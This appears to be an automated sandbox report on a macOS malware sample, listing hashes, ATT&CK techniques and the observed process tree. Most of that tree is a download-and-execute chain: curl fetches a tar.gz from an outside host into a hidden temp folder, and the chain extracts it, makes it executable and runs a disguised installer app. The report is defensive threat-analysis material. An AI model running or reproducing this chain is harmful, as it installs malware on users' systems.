b850cd121b76d1b1610a05fde0c7a11e3169f545617a5a5b0e7c440bd7b30944

Analysis

max time kernel
7s
max time network
106s
platform
macos-10.15_amd64
resource
macos-20241101-en
resource tags

arch:amd64arch:i386image:macos-20241101-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
17/02/2025, 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
Size

48KB
MD5

ecd1f29667a6087e752fe16b1b776494
SHA1

e85686e7f9038228efc3fc55c4d39edf5f82506a
SHA256

0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
SHA512

1e6bb4daf0dc8962fd9bf8775bbbba75c802e0a90bd0b6b8f4f73fb410e2389d07f78ede3ffaeaca9a31ff5f4a1653ce18168c4d572c4ec55e03dda51ea315c7
SSDEEP

768:PtnLm/quXoMJWz1tO1JgcJyjf7KcflZyU1v7oVy89hrO8r3mJc:PPMc1tO1JBJyjGcfFky8rmJ

Score

7^/10

defense_evasion execution exfiltration

Malware Config

Signatures

Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

exfiltration

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

ioc	Process
/usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844745" -o /private/tmp/.mmstmp//stmp.tar.gz	Process not Found

File Permission 1 TTPs
Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Resource Forking 1 TTPs 1 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

defense_evasion

Resource Forking

T1564.009

ioc	Process
/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -	Process not Found

Command and Scripting Interpreter 1 TTPs
Adversaries may abuse Unix shell commands and scripts for execution.
execution

Unix Shell
T1059.004

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061\""
1⤵
PID:502

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061\""
1⤵
PID:502

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
1⤵
PID:502
- /bin/zsh
  /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
  2⤵
  PID:503
- /Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
  /Users/run/Macos-Malware-Samples-main/0941ef4c37d983720934aae64b03511d5707f7e77d4ed7f9d31cfd8e8ecba061
  2⤵
  PID:503
- - /usr/bin/python
    /usr/bin/python -
    3⤵
    PID:504
- - /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
    /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -
    3⤵
    PID:504
  - - /usr/bin/curl
      /usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844745" -o /private/tmp/.mmstmp//stmp.tar.gz
      4⤵
      PID:505

/usr/libexec/xpcproxy
xpcproxy com.apple.sysmond
1⤵
PID:506

/usr/libexec/sysmond
/usr/libexec/sysmond
1⤵
PID:506

/bin/sh
sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
1⤵
PID:507

/bin/bash
sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
1⤵
PID:507

/usr/bin/tar
/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/
1⤵
PID:507

/bin/sh
sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
1⤵
PID:508

/bin/bash
sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
1⤵
PID:508

/bin/chmod
/bin/chmod +x /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
1⤵
PID:508

/bin/sh
sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
1⤵
PID:509

/bin/bash
sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
1⤵
PID:509

/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
1⤵
PID:509

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Unix Shell

T1059.004

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hide Artifacts

T1564

Resource Forking

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Exfiltration Over Alternative Protocol

T1048

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads